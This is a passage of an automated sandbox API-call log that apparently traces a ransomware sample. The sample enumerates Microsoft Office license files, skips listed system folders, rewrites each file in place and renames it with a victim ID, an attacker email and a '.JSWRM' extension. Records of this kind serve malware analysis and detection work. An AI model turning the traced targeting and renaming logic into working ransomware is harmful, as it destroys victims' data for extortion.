lpWideCharStr="SkypeforBusinessR_Retail-ul-oob.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0109.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0109.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0109.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Retail-ul-oob.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0109.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0109.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Retail-ul-oob.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22ce70, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0109.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0109.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0109.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0109.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0109.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.958] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11629) returned 1 [0109.958] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0109.958] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0109.960] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.960] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0109.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.960] CloseHandle (hObject=0x45c) returned 1 [0109.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0109.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0109.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0109.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0109.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0109.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0109.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0109.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0109.961] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0109.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0109.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0109.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0109.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.962] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb48a216, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb48a216, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb5e174f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4e06, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeforBusinessR_Retail-ul-phn.xrm-ms", cAlternateFileName="SKDDBC~1.XRM")) returned 1 [0109.962] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0109.962] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0109.962] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0109.962] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0109.962] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned 1 [0109.962] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0109.962] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0109.962] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.962] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0109.962] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0109.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0109.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Retail-ul-phn.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0109.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Retail-ul-phn.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d0a0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0109.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0109.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0109.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Retail-ul-phn.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0109.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Retail-ul-phn.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0109.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0109.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0109.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0109.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0109.963] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.963] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19974) returned 1 [0109.963] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e00) returned 0x24c1d0 [0109.963] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4e00, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4e00, lpOverlapped=0x0) returned 1 [0110.015] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.015] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4e00, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4e00, lpOverlapped=0x0) returned 1 [0110.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.015] CloseHandle (hObject=0x45c) returned 1 [0110.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0110.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0110.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0110.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0110.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0110.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0110.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0110.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f280 [0110.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0110.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0110.016] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0110.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0110.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0110.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.018] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb37f192, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb37f192, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb548de7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2baf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeforBusinessR_Trial-pl.xrm-ms", cAlternateFileName="SKC840~1.XRM")) returned 1 [0110.018] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-pl.xrm-ms", lpString2=".") returned 1 [0110.018] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-pl.xrm-ms", lpString2="..") returned 1 [0110.018] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-pl.xrm-ms", lpString2="...") returned 1 [0110.018] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-pl.xrm-ms", lpString2="windows") returned -1 [0110.018] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-pl.xrm-ms", lpString2="recovery") returned 1 [0110.018] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-pl.xrm-ms", lpString2="perflogs") returned 1 [0110.018] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0110.018] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.018] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-pl.xrm-ms", lpString2="system volume information") returned -1 [0110.018] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-pl.xrm-ms", lpString2="msocache") returned 1 [0110.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0110.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Trial-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0110.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Trial-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0110.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0110.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0110.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Trial-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0110.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0110.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Trial-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d298, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0110.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0110.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0110.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0110.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0110.018] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_trial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.019] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11183) returned 1 [0110.019] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0110.019] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0110.109] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.109] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0110.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.109] CloseHandle (hObject=0x45c) returned 1 [0110.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0110.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0110.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0110.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0110.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0110.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0110.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0110.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0110.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0110.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0110.110] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_trial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Trial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_trial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0110.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0110.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0110.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0110.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.111] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb332ce4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb332ce4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb522b88, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51bc, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeforBusinessR_Trial-ppd.xrm-ms", cAlternateFileName="SKA82E~1.XRM")) returned 1 [0110.111] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-ppd.xrm-ms", lpString2=".") returned 1 [0110.112] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-ppd.xrm-ms", lpString2="..") returned 1 [0110.112] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-ppd.xrm-ms", lpString2="...") returned 1 [0110.112] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-ppd.xrm-ms", lpString2="windows") returned -1 [0110.112] 